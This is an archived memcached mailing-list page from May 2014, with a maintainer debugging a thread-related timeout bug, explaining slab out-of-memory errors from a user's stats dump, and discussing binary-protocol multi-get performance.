 Why do you say it will be less likely to happen with 2 threads than 4?

 On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote:
   That doesn't really tell us anything about the nature of the problem
   though. With 2 threads it might still happen, but is a lot less likely.

   On Wed, 7 May 2014, notifi...@commando.io wrote:

Bumped up to 2 threads and so far no timeout errors. I'm going to let 
 it run for a few more days, then revert back to 4 threads and
   see if timeout
errors come up again. That will tell us the problem lies in spawning 
 more than 2 threads.
   
On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
      Hey,
   
      try this branch:
      https://github.com/dormando/memcached/tree/double_close
   
      so far as I can tell that emulates the behavior in .17...
   
      to build:
      ./autogen.sh  ./configure  make
   
      run it in screen like you were doing with the other tests, see 
 if it
      prints ERROR: Double Close [somefd]. If it prints that once 
 then stops,
      I guess that's what .17 was doing... if it print spams, then 
 something
      else may have changed.
   
      I'm mostly convinced something about your OS or build is 
 corrupt, but I
      have no idea what it is. The only other thing I can think of is 
 to
      instrument .17 a bit more and have you try that (with the 
 connection code
      laid out the old way, but with a conn_closed flag to detect a 
 double close
      attempt), and see if the old .17 still did it.
   
      On Tue, 6 May 2014, notifi...@commando.io wrote:
   
       Changing from 4 threads to 1 seems to have resolved the 
 problem. No timeouts since. Should I set to 2 threads and wait and
   see how
      things go?
      
       On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
             and how'd that work out?
      
             Still no other reports :/ a few thousand more downloads 
 of .19...
      
             On Sun, 4 May 2014, notifi...@commando.io wrote

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-08 Thread dormando
 I am just speculating, and by no means have any idea what I am really talking 
 about here. :)
 With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. 
 Increasing from 2 threads to 4 does not generate any more traffic or
 requests to memcached. Thus I am speculating perhaps it is a race-condition 
 or some sort, only hitting with  2 threads.

Doesn't tell me anything useful, since I'm already looking for potential
races and don't see any possibility outside of libevent.

 Why do you say it will be less likely to happen with 2 threads than 4?

Nature of race conditions: the more threads you have running the more
likely you are to hit them, sometimes on order of magnitudes.

It doesn't really change the fact that this has worked for many years and
the code *barely* changed recently. I just don't see it.

 On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote:
   That doesn't really tell us anything about the nature of the problem
   though. With 2 threads it might still happen, but is a lot less likely.

   On Wed, 7 May 2014, notifi...@commando.io wrote:

Bumped up to 2 threads and so far no timeout errors. I'm going to let 
 it run for a few more days, then revert back to 4 threads and
   see if timeout
errors come up again. That will tell us the problem lies in spawning 
 more than 2 threads.
   
On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
      Hey,
   
      try this branch:
      https://github.com/dormando/memcached/tree/double_close
   
      so far as I can tell that emulates the behavior in .17...
   
      to build:
      ./autogen.sh  ./configure  make
   
      run it in screen like you were doing with the other tests, see 
 if it
      prints ERROR: Double Close [somefd]. If it prints that once 
 then stops,
      I guess that's what .17 was doing... if it print spams, then 
 something
      else may have changed.
   
      I'm mostly convinced something about your OS or build is 
 corrupt, but I
      have no idea what it is. The only other thing I can think of is 
 to
      instrument .17 a bit more and have you try that (with the 
 connection code
      laid out the old way, but with a conn_closed flag to detect a 
 double close
      attempt), and see if the old .17 still did it.
   
      On Tue, 6 May 2014, notifi...@commando.io wrote:
   
       Changing from 4 threads to 1 seems to have resolved the 
 problem. No timeouts since. Should I set to 2 threads and wait and
   see how
      things go?
      
       On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
             and how'd that work out?
      
             Still no other reports :/ a few thousand more downloads 
 of .19...
      
             On Sun, 4 May 2014, notifi...@commando.io wrote:
      
              I'm going to try switching threads from 4 to 1. This 
 host web2 is on the only one I am seeing it on, but it also is
   the only
      hosts
             that gets any
              real traffic. Super frustrating.
             
              On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando 
 wrote:
                    I'm stumped. (also, your e-mails aren't 
 updating the ticket...).
             
                    It's impossible for a connection to get into 
 the closed state without
                    having event_del() and close() called on the 
 socket. A socket slot isn't
                    event_add()'ed again until after the state is 
 reset to 'init_state'.
             
                    There was no code path for event_del to 
 actually fail so far as I could
                    see.
             
                    I've e-mailed steven grimm for ideas but either 
 that's not his e-mail
                    anymore or he's not going to respond.
             
                    I really don't know. I guess the old code 
 would've just called conn_close
                    again by accident... I don't see how the logic 
 changed in any significant
                    way in .18. Though again, if it happened with 
 any frequency people's
                    curr_conns stat would go negative.
             
                    So... either that always happened and we never 
 noticed, or your particular
                    OS is corrupt. There're probably 10,000+ 
 installs of .18+ now and only one
                    complaint, so I'm a little hesitant to spend a 
 ton of time on this until
                    we get more reports

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-08 Thread dormando
To that note, it *is* useful if you try that branch I posted, since so far
as I can tell that should emulate the .17 behavior.

On Thu, 8 May 2014, dormando wrote:

  I am just speculating, and by no means have any idea what I am really 
  talking about here. :)
  With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been 
  days. Increasing from 2 threads to 4 does not generate any more traffic or
  requests to memcached. Thus I am speculating perhaps it is a race-condition 
  or some sort, only hitting with  2 threads.

 Doesn't tell me anything useful, since I'm already looking for potential
 races and don't see any possibility outside of libevent.

  Why do you say it will be less likely to happen with 2 threads than 4?

 Nature of race conditions: the more threads you have running the more
 likely you are to hit them, sometimes on order of magnitudes.

 It doesn't really change the fact that this has worked for many years and
 the code *barely* changed recently. I just don't see it.

  On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote:
That doesn't really tell us anything about the nature of the problem
though. With 2 threads it might still happen, but is a lot less 
  likely.
 
On Wed, 7 May 2014, notifi...@commando.io wrote:
 
 Bumped up to 2 threads and so far no timeout errors. I'm going to 
  let it run for a few more days, then revert back to 4 threads and
see if timeout
 errors come up again. That will tell us the problem lies in 
  spawning more than 2 threads.

 On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
       Hey,

       try this branch:
       https://github.com/dormando/memcached/tree/double_close

       so far as I can tell that emulates the behavior in .17...

       to build:
       ./autogen.sh  ./configure  make

       run it in screen like you were doing with the other tests, 
  see if it
       prints ERROR: Double Close [somefd]. If it prints that once 
  then stops,
       I guess that's what .17 was doing... if it print spams, then 
  something
       else may have changed.

       I'm mostly convinced something about your OS or build is 
  corrupt, but I
       have no idea what it is. The only other thing I can think of 
  is to
       instrument .17 a bit more and have you try that (with the 
  connection code
       laid out the old way, but with a conn_closed flag to detect a 
  double close
       attempt), and see if the old .17 still did it.

       On Tue, 6 May 2014, notifi...@commando.io wrote:

        Changing from 4 threads to 1 seems to have resolved the 
  problem. No timeouts since. Should I set to 2 threads and wait and
see how
       things go?
       
        On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
              and how'd that work out?
       
              Still no other reports :/ a few thousand more 
  downloads of .19...
       
              On Sun, 4 May 2014, notifi...@commando.io wrote:
       
               I'm going to try switching threads from 4 to 1. 
  This host web2 is on the only one I am seeing it on, but it also is
the only
       hosts
              that gets any
               real traffic. Super frustrating.
              
               On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando 
  wrote:
                     I'm stumped. (also, your e-mails aren't 
  updating the ticket...).
              
                     It's impossible for a connection to get into 
  the closed state without
                     having event_del() and close() called on the 
  socket. A socket slot isn't
                     event_add()'ed again until after the state is 
  reset to 'init_state'.
              
                     There was no code path for event_del to 
  actually fail so far as I could
                     see.
              
                     I've e-mailed steven grimm for ideas but 
  either that's not his e-mail
                     anymore or he's not going to respond.
              
                     I really don't know. I guess the old code 
  would've just called conn_close
                     again by accident... I don't see how the 
  logic changed in any significant
                     way in .18. Though again, if it happened with 
  any frequency people's
                     curr_conns stat would go negative.
              
                     So... either that always happened and we 
  never noticed, or your particular

Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error

2014-05-08 Thread dormando
 Dormando,Yes, have to admit - we cache too aggressively (just do not want to 
 use different less polite word :)).

 Going to do two test experiments: enable compression and auto reallocation. 
 Before doing this:
 1) why auto reallocation is not enabled by default, what issues/disadvantage 
 to expect?

Because it pulls memory from other places and evicts those items
regardless of if they were still valid or expired. There's no way for it
to reassign slab pages of just expired memory. Some people would prefer
to just let evictions fall from the tail (least used) rather than do this,
so we didn't change the defaults after introducing the feature.

 2) why memcached does not have compression on server side if CPU is idle, 
 because of ideology to keep it simple and fast? (just asking)

I said already: in typical use case there are many more clients, and a
very high rate of usage. If you flipped where the compression happens the
server would run out of CPU very quickly, and be much more latent. We
could support it in the server but it'd be a very low priority feature.

 On Tuesday, May 6, 2014 6:40:07 PM UTC-7, Dormando wrote:
Hi Dormando,
Full Slabs and Items stats are below. The problem is that other slabs 
 are full too, so rebalancing is not trivial. I will try to
   create a wrapper
that will do some analysis and do slab rebalancing based on stats 
 (the idea to move try to shrink slabs with low eviction but need to
   think more).
But i see there is Slabs Automove in protocol.txt. Do you recommend 
 it?

   If it fits your needs. Otherwise, write an external daemon that controls
   the automover based on your own needs.

You either need to add more memory to the total system or rebalance 
 them. 
we run many-many memcached servers with 30Gb+ memory each box. And 
 the problem occurs on some boxes periodically. So I am thinking
   how to convert
manual restart to automatic action.

   I'm not sure why restarting will fix it, if above you say rebalancing 
 is
   not trivial. If restarting would fix it, rebalancing would also fix it.

   From the stats below, you do have a fair amount of memory spread out
   among the higher order slab classes. Compression, or otherwise
   re-evaluating how you store those values may make a big difference.

   There's also a huge amount of stuff being evicted without ever being
   fetched again. Are you caching too aggressively, or is memory just way 
 too
   small and they never get a chance to be fetched after being set?

   I'm just eyeballing it but evicted_time seems pretty short (a matter of
   hours). That's the last access time of the last object to be evicted...
   and it's like that across most of your slab classes.

   So, shuffle and compress and whatnot, but I think you're out of ram 
 dude.

server
stats
STAT pid 15480
STAT uptime 2476264
STAT time 1399422427
STAT version 1.4.15
STAT libevent 1.4.13-stable
STAT pointer_size 64
STAT rusage_user 639012.117392
STAT rusage_system 2076810.323840
STAT curr_connections 5237
STAT total_connections 122995977
STAT connection_structures 23402
STAT reserved_fds 40
STAT cmd_get 91928675147
STAT cmd_set 4358475896
STAT cmd_flush 1
STAT cmd_touch 0
STAT get_hits 85005900667
STAT get_misses 6922774480
STAT delete_misses 4238049567
STAT delete_hits 885535057
STAT incr_misses 0
STAT incr_hits 0
STAT decr_misses 0
STAT decr_hits 0
STAT cas_misses 1074
STAT cas_hits 4784930
STAT cas_badval 14966
STAT touch_hits 0
STAT touch_misses 0
STAT auth_cmds 0
STAT auth_errors 0
STAT bytes_read 32317259718167
STAT bytes_written 221039272582722
STAT limit_maxbytes 25769803776
STAT accepting_conns 1
STAT listen_disabled_num 0
STAT threads 8
STAT conn_yields 0
STAT hash_power_level 25
STAT hash_bytes 268435456
STAT hash_is_expanding 0
STAT slab_reassign_running 0
STAT slabs_moved 0
STAT bytes 23567307974
STAT curr_items 32559669
STAT total_items 61290586
STAT expired_unfetched 6664504
STAT evicted_unfetched 1244432758
STAT evictions 2522683859
STAT reclaimed 7626148
END
   
   
   
stats slabs
STAT 1:chunk_size 96
STAT 1:chunks_per_page 10922
STAT 1:total_pages 1
STAT 1:total_chunks 10922
STAT 1:used_chunks 0
STAT 1:free_chunks 10922
STAT 1:free_chunks_end 0
STAT 1:mem_requested 0
STAT 1:get_hits 9905
STAT 1:cmd_set 10362
STAT 1:delete_hits 9582
STAT 1:incr_hits 0
STAT 1:decr_hits

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-07 Thread dormando
Hey,

try this branch:
https://github.com/dormando/memcached/tree/double_close

so far as I can tell that emulates the behavior in .17...

to build:
./autogen.sh  ./configure  make

run it in screen like you were doing with the other tests, see if it
prints ERROR: Double Close [somefd]. If it prints that once then stops,
I guess that's what .17 was doing... if it print spams, then something
else may have changed.

I'm mostly convinced something about your OS or build is corrupt, but I
have no idea what it is. The only other thing I can think of is to
instrument .17 a bit more and have you try that (with the connection code
laid out the old way, but with a conn_closed flag to detect a double close
attempt), and see if the old .17 still did it.

On Tue, 6 May 2014, notificati...@commando.io wrote:

 Changing from 4 threads to 1 seems to have resolved the problem. No timeouts 
 since. Should I set to 2 threads and wait and see how things go?

 On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
   and how'd that work out?

   Still no other reports :/ a few thousand more downloads of .19...

   On Sun, 4 May 2014, notifi...@commando.io wrote:

I'm going to try switching threads from 4 to 1. This host web2 is on 
 the only one I am seeing it on, but it also is the only hosts
   that gets any
real traffic. Super frustrating.
   
On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote:
      I'm stumped. (also, your e-mails aren't updating the ticket...).
   
      It's impossible for a connection to get into the closed state 
 without
      having event_del() and close() called on the socket. A socket 
 slot isn't
      event_add()'ed again until after the state is reset to 
 'init_state'.
   
      There was no code path for event_del to actually fail so far as 
 I could
      see.
   
      I've e-mailed steven grimm for ideas but either that's not his 
 e-mail
      anymore or he's not going to respond.
   
      I really don't know. I guess the old code would've just called 
 conn_close
      again by accident... I don't see how the logic changed in any 
 significant
      way in .18. Though again, if it happened with any frequency 
 people's
      curr_conns stat would go negative.
   
      So... either that always happened and we never noticed, or your 
 particular
      OS is corrupt. There're probably 10,000+ installs of .18+ now 
 and only one
      complaint, so I'm a little hesitant to spend a ton of time on 
 this until
      we get more reports.
   
      You should downgrade to .17.
   
      On Sun, 4 May 2014, notifi...@commando.io wrote:
   
       Damn it, got network timeout. CPU 3 is using 100% cpu from 
 memcached.
       Here is the result of stat to verify using new version of 
 memcached and libevent:
      
       STAT version 1.4.19
       STAT libevent 2.0.18-stable
      
      
       On Saturday, May 3, 2014 11:55:31 PM UTC-7, 
 notifi...@commando.io wrote:
             Just upgraded all 5 web-servers to memcached 1.4.19 
 with libevent 2.0.18. Will advise if I see memcached timeouts.
   Should be
      good
             though.
      
       Thanks so much for all the help and patience. Really 
 appreciated.
      
       On Friday, May 2, 2014 10:20:26 PM UTC-7, 
 memc...@googlecode.com wrote:
             Updates:
             Status: Invalid
      
             Comment #20 on issue 363 by dorma...@rydia.net: 
 MemcachePool::get(): Server  
             127.0.0.1 (tcp 11211, udp 0) failed with: Network 
 timeout
             http://code.google.com/p/memcached/issues/detail?id=363
      
             Any repeat crashes? I'm going to close this. it looks 
 like remi  
             shipped .19. reopen or open a new one if it hangs in 
 the same way somehow...
      
             Well. 19 won't be printing anything, and it won't hang, 
 but if it's  
             actually our bug and not libevent it would end up 
 spinning CPU. Keep an eye  
             out I guess.
      
             --
             You received this message because this project is 
 configured to send all  
             issue notifications to this address.
             You may adjust your notification preferences at:
             https://code.google.com/hosting/settings
      
       --
      
       ---
       You received this message because you are subscribed to the 
 Google Groups memcached group.
       To unsubscribe from this group and stop receiving

Re: Multi-get implementation in binary protocol

2014-05-07 Thread dormando
 Hello,

 For now, I'm trying to evaluate the performance of memcached server by using 
 several client workloads.
 I have a question about multi-get implementation in binary protocol.
 As I know, in ascii protocol, we can send multiple keys in a single request 
 packet to implement multi-get.

 But, in a binary protocol, it seems that we should send multiple request 
 packets (one request packet per key) to implement multi-get.
 Even though we send multiple getQ, then sends get for the last key, we only 
 can save the number of response packets only for cache miss.
 If I understand correctly, multi-get in binary protocol cannot reduce the 
 number of request packets, and
 it also cannot reduce the number of response packets if hit-ratio is very 
 high (like 99% get hit).

 If the performance bottleneck is on the network side not on the CPU, I think 
 reducing the number of packets is still very important,
 but I don't understand why the binary protocol doesn't care about this.
 I missed something?

you're right, it sucks. I was never happy with it, but haven't had time to
add adjustments to the protocol for this. To note, with .19 some
inefficiencies with the protocol were lifted, and most network cards are
fast enough for most situations, even if it's one packet per response (and
for large enough responses they split into multiple packets, anyway).

The reason why this was done is for latency and streaming of responses:

- In ascii multiget, I can send 10,000 keys, then I'm forced to wait for
the server to look up all of the keys before sending its responses, this
isn't typically very high but there's some latency to it.

- In binary multiget, the responses are sent back as it receives them from
the network more or less. This reduces the latency to when you start
seeing responses, regardless of how large your multiget is. this is useful
if you have a kind of client which can start processing responses in a
streaming fashion. This potentially reduces the total time to render your
response since you can keep the CPU busy unmarshalling responses instead
of sleeping.

However, it should have some tunables: One where it at least does one
write per complete packet (TCP_CORK'ed, or similar), and one where it
buffers up to some size. In my tests I can get ascii multiget up to 16.2
million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and
is spending all of its time calling sendmsg(). Most people need far, far
less than that, so the binprot as is should be okay though.

The code isn't too friendly to this and there're other higher priority
things I'd like to get done sooner. The relatively few number of people
who do 500,000+ requests per second in binprot (they're almost always
ascii at that scale) is the other reason.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-07 Thread dormando
That doesn't really tell us anything about the nature of the problem
though. With 2 threads it might still happen, but is a lot less likely.

On Wed, 7 May 2014, notificati...@commando.io wrote:

 Bumped up to 2 threads and so far no timeout errors. I'm going to let it run 
 for a few more days, then revert back to 4 threads and see if timeout
 errors come up again. That will tell us the problem lies in spawning more 
 than 2 threads.

 On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
   Hey,

   try this branch:
   https://github.com/dormando/memcached/tree/double_close

   so far as I can tell that emulates the behavior in .17...

   to build:
   ./autogen.sh  ./configure  make

   run it in screen like you were doing with the other tests, see if it
   prints ERROR: Double Close [somefd]. If it prints that once then 
 stops,
   I guess that's what .17 was doing... if it print spams, then something
   else may have changed.

   I'm mostly convinced something about your OS or build is corrupt, but I
   have no idea what it is. The only other thing I can think of is to
   instrument .17 a bit more and have you try that (with the connection 
 code
   laid out the old way, but with a conn_closed flag to detect a double 
 close
   attempt), and see if the old .17 still did it.

   On Tue, 6 May 2014, notifi...@commando.io wrote:

Changing from 4 threads to 1 seems to have resolved the problem. No 
 timeouts since. Should I set to 2 threads and wait and see how
   things go?
   
On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
      and how'd that work out?
   
      Still no other reports :/ a few thousand more downloads of 
 .19...
   
      On Sun, 4 May 2014, notifi...@commando.io wrote:
   
       I'm going to try switching threads from 4 to 1. This host 
 web2 is on the only one I am seeing it on, but it also is the only
   hosts
      that gets any
       real traffic. Super frustrating.
      
       On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote:
             I'm stumped. (also, your e-mails aren't updating the 
 ticket...).
      
             It's impossible for a connection to get into the closed 
 state without
             having event_del() and close() called on the socket. A 
 socket slot isn't
             event_add()'ed again until after the state is reset to 
 'init_state'.
      
             There was no code path for event_del to actually fail 
 so far as I could
             see.
      
             I've e-mailed steven grimm for ideas but either that's 
 not his e-mail
             anymore or he's not going to respond.
      
             I really don't know. I guess the old code would've just 
 called conn_close
             again by accident... I don't see how the logic changed 
 in any significant
             way in .18. Though again, if it happened with any 
 frequency people's
             curr_conns stat would go negative.
      
             So... either that always happened and we never noticed, 
 or your particular
             OS is corrupt. There're probably 10,000+ installs of 
 .18+ now and only one
             complaint, so I'm a little hesitant to spend a ton of 
 time on this until
             we get more reports.
      
             You should downgrade to .17.
      
             On Sun, 4 May 2014, notifi...@commando.io wrote:
      
              Damn it, got network timeout. CPU 3 is using 100% cpu 
 from memcached.
              Here is the result of stat to verify using new 
 version of memcached and libevent:
             
              STAT version 1.4.19
              STAT libevent 2.0.18-stable
             
             
              On Saturday, May 3, 2014 11:55:31 PM UTC-7, 
 notifi...@commando.io wrote:
                    Just upgraded all 5 web-servers to memcached 
 1.4.19 with libevent 2.0.18. Will advise if I see memcached
   timeouts.
      Should be
             good
                    though.
             
              Thanks so much for all the help and patience. Really 
 appreciated.
             
              On Friday, May 2, 2014 10:20:26 PM UTC-7, 
 memc...@googlecode.com wrote:
                    Updates:
                    Status: Invalid
             
                    Comment #20 on issue 363 by dorma...@rydia.net: 
 MemcachePool::get(): Server  
                    127.0.0.1 (tcp 11211, udp 0) failed with: 
 Network timeout

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-06 Thread dormando
and how'd that work out?

Still no other reports :/ a few thousand more downloads of .19...

On Sun, 4 May 2014, notificati...@commando.io wrote:

 I'm going to try switching threads from 4 to 1. This host web2 is on the only 
 one I am seeing it on, but it also is the only hosts that gets any
 real traffic. Super frustrating.

 On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote:
   I'm stumped. (also, your e-mails aren't updating the ticket...).

   It's impossible for a connection to get into the closed state without
   having event_del() and close() called on the socket. A socket slot isn't
   event_add()'ed again until after the state is reset to 'init_state'.

   There was no code path for event_del to actually fail so far as I could
   see.

   I've e-mailed steven grimm for ideas but either that's not his e-mail
   anymore or he's not going to respond.

   I really don't know. I guess the old code would've just called 
 conn_close
   again by accident... I don't see how the logic changed in any 
 significant
   way in .18. Though again, if it happened with any frequency people's
   curr_conns stat would go negative.

   So... either that always happened and we never noticed, or your 
 particular
   OS is corrupt. There're probably 10,000+ installs of .18+ now and only 
 one
   complaint, so I'm a little hesitant to spend a ton of time on this until
   we get more reports.

   You should downgrade to .17.

   On Sun, 4 May 2014, notifi...@commando.io wrote:

Damn it, got network timeout. CPU 3 is using 100% cpu from memcached.
Here is the result of stat to verify using new version of memcached 
 and libevent:
   
STAT version 1.4.19
STAT libevent 2.0.18-stable
   
   
On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io 
 wrote:
      Just upgraded all 5 web-servers to memcached 1.4.19 with 
 libevent 2.0.18. Will advise if I see memcached timeouts. Should be
   good
      though.
   
Thanks so much for all the help and patience. Really appreciated.
   
On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com 
 wrote:
      Updates:
      Status: Invalid
   
      Comment #20 on issue 363 by dorma...@rydia.net: 
 MemcachePool::get(): Server  
      127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
      http://code.google.com/p/memcached/issues/detail?id=363
   
      Any repeat crashes? I'm going to close this. it looks like remi 
  
      shipped .19. reopen or open a new one if it hangs in the same 
 way somehow...
   
      Well. 19 won't be printing anything, and it won't hang, but if 
 it's  
      actually our bug and not libevent it would end up spinning CPU. 
 Keep an eye  
      out I guess.
   
      --
      You received this message because this project is configured to 
 send all  
      issue notifications to this address.
      You may adjust your notification preferences at:
      https://code.google.com/hosting/settings
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error

2014-05-06 Thread dormando

 Hi,
 Does anybody know good way to handle OOM during set operation? Server is 
 fully calcified :) (no new pages to allocate) and i have this issue for
 slab 17
 STAT items:17:number 16128
 STAT items:17:age 90
 STAT items:17:evicted 246790897
 STAT items:17:evicted_nonzero 246790874
 STAT items:17:evicted_time 90
 STAT items:17:outofmemory 33098
 STAT items:17:tailrepairs 0
 STAT items:17:reclaimed 1183
 STAT items:17:expired_unfetched 196
 STAT items:17:evicted_unfetched 143699820

 running memcached : STAT version 1.4.15

stats slabs ? Is memory unbalanced from other slabs?

 nothing except reboot periodically comes to my mind but this solution does 
 not make me happy :)

There's the slab rebalance feature. OOM errors only happen when there is
truly very few pages free and all of the ones in the tail are locked, or
there's a bug. It should always evict. The rebalance feature is documented
in doc/protocol.txt.

However your eviction seems to be very highly pressured. The
evicted_unfetched stat is high compared to the tota number of evictions.
So they're not even staying in long enough to get fetched again. There
aren't that many OOM errors overall, so perhaps you are just hitting that
slab way too hard and occasionally locking everything in the tail.

You either need to add more memory to the total system or rebalance them.

 other option - enable compression to allow more items but need to experiment 
 (why memcached does not provide server side compression? as i see in
 stats memcached cpu is not used, so would be good to utilize it.) 

Very high rate of access is expected and the ratio of clients to servers
might be high, so compression is done in the client instead. It was also
designed to let you run it wherever there's free memory (extra installed
in webservers/etc) so it wants to avoid excess cpu usage.

It's a trivial switch either way.

Also consider upgrading to .17 or .19. might be some good fixes.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error

2014-05-06 Thread dormando
 Hi Dormando,
 Full Slabs and Items stats are below. The problem is that other slabs are 
 full too, so rebalancing is not trivial. I will try to create a wrapper
 that will do some analysis and do slab rebalancing based on stats (the idea 
 to move try to shrink slabs with low eviction but need to think more).
 But i see there is Slabs Automove in protocol.txt. Do you recommend it?

If it fits your needs. Otherwise, write an external daemon that controls
the automover based on your own needs.

 You either need to add more memory to the total system or rebalance them. 
 we run many-many memcached servers with 30Gb+ memory each box. And the 
 problem occurs on some boxes periodically. So I am thinking how to convert
 manual restart to automatic action.

I'm not sure why restarting will fix it, if above you say rebalancing is
not trivial. If restarting would fix it, rebalancing would also fix it.

From the stats below, you do have a fair amount of memory spread out
among the higher order slab classes. Compression, or otherwise
re-evaluating how you store those values may make a big difference.

There's also a huge amount of stuff being evicted without ever being
fetched again. Are you caching too aggressively, or is memory just way too
small and they never get a chance to be fetched after being set?

I'm just eyeballing it but evicted_time seems pretty short (a matter of
hours). That's the last access time of the last object to be evicted...
and it's like that across most of your slab classes.

So, shuffle and compress and whatnot, but I think you're out of ram dude.

 server
 stats
 STAT pid 15480
 STAT uptime 2476264
 STAT time 1399422427
 STAT version 1.4.15
 STAT libevent 1.4.13-stable
 STAT pointer_size 64
 STAT rusage_user 639012.117392
 STAT rusage_system 2076810.323840
 STAT curr_connections 5237
 STAT total_connections 122995977
 STAT connection_structures 23402
 STAT reserved_fds 40
 STAT cmd_get 91928675147
 STAT cmd_set 4358475896
 STAT cmd_flush 1
 STAT cmd_touch 0
 STAT get_hits 85005900667
 STAT get_misses 6922774480
 STAT delete_misses 4238049567
 STAT delete_hits 885535057
 STAT incr_misses 0
 STAT incr_hits 0
 STAT decr_misses 0
 STAT decr_hits 0
 STAT cas_misses 1074
 STAT cas_hits 4784930
 STAT cas_badval 14966
 STAT touch_hits 0
 STAT touch_misses 0
 STAT auth_cmds 0
 STAT auth_errors 0
 STAT bytes_read 32317259718167
 STAT bytes_written 221039272582722
 STAT limit_maxbytes 25769803776
 STAT accepting_conns 1
 STAT listen_disabled_num 0
 STAT threads 8
 STAT conn_yields 0
 STAT hash_power_level 25
 STAT hash_bytes 268435456
 STAT hash_is_expanding 0
 STAT slab_reassign_running 0
 STAT slabs_moved 0
 STAT bytes 23567307974
 STAT curr_items 32559669
 STAT total_items 61290586
 STAT expired_unfetched 6664504
 STAT evicted_unfetched 1244432758
 STAT evictions 2522683859
 STAT reclaimed 7626148
 END



 stats slabs
 STAT 1:chunk_size 96
 STAT 1:chunks_per_page 10922
 STAT 1:total_pages 1
 STAT 1:total_chunks 10922
 STAT 1:used_chunks 0
 STAT 1:free_chunks 10922
 STAT 1:free_chunks_end 0
 STAT 1:mem_requested 0
 STAT 1:get_hits 9905
 STAT 1:cmd_set 10362
 STAT 1:delete_hits 9582
 STAT 1:incr_hits 0
 STAT 1:decr_hits 0
 STAT 1:cas_hits 0
 STAT 1:cas_badval 0
 STAT 1:touch_hits 0
 STAT 2:chunk_size 120
 STAT 2:chunks_per_page 8738
 STAT 2:total_pages 1
 STAT 2:total_chunks 8738
 STAT 2:used_chunks 13
 STAT 2:free_chunks 8725
 STAT 2:free_chunks_end 0
 STAT 2:mem_requested 1350
 STAT 2:get_hits 1309125
 STAT 2:cmd_set 2963710
 STAT 2:delete_hits 199018
 STAT 2:incr_hits 0
 STAT 2:decr_hits 0
 STAT 2:cas_hits 770681
 STAT 2:cas_badval 3697
 STAT 2:touch_hits 0
 STAT 3:chunk_size 152
 STAT 3:chunks_per_page 6898
 STAT 3:total_pages 5
 STAT 3:total_chunks 34490
 STAT 3:used_chunks 34240
 STAT 3:free_chunks 250
 STAT 3:free_chunks_end 0
 STAT 3:mem_requested 483
 STAT 3:get_hits 2088979
 STAT 3:cmd_set 4355223
 STAT 3:delete_hits 3392
 STAT 3:incr_hits 0
 STAT 3:decr_hits 0
 STAT 3:cas_hits 0
 STAT 3:cas_badval 0
 STAT 3:touch_hits 0
 STAT 4:chunk_size 192
 STAT 4:chunks_per_page 5461
 STAT 4:total_pages 11
 STAT 4:total_chunks 60071
 STAT 4:used_chunks 60070
 STAT 4:free_chunks 1
 STAT 4:free_chunks_end 0
 STAT 4:mem_requested 10821971
 STAT 4:get_hits 65413752
 STAT 4:cmd_set 22935889
 STAT 4:delete_hits 6028
 STAT 4:incr_hits 0
 STAT 4:decr_hits 0
 STAT 4:cas_hits 0
 STAT 4:cas_badval 0
 STAT 4:touch_hits 0
 STAT 5:chunk_size 240
 STAT 5:chunks_per_page 4369
 STAT 5:total_pages 756
 STAT 5:total_chunks 3302964
 STAT 5:used_chunks 3302964
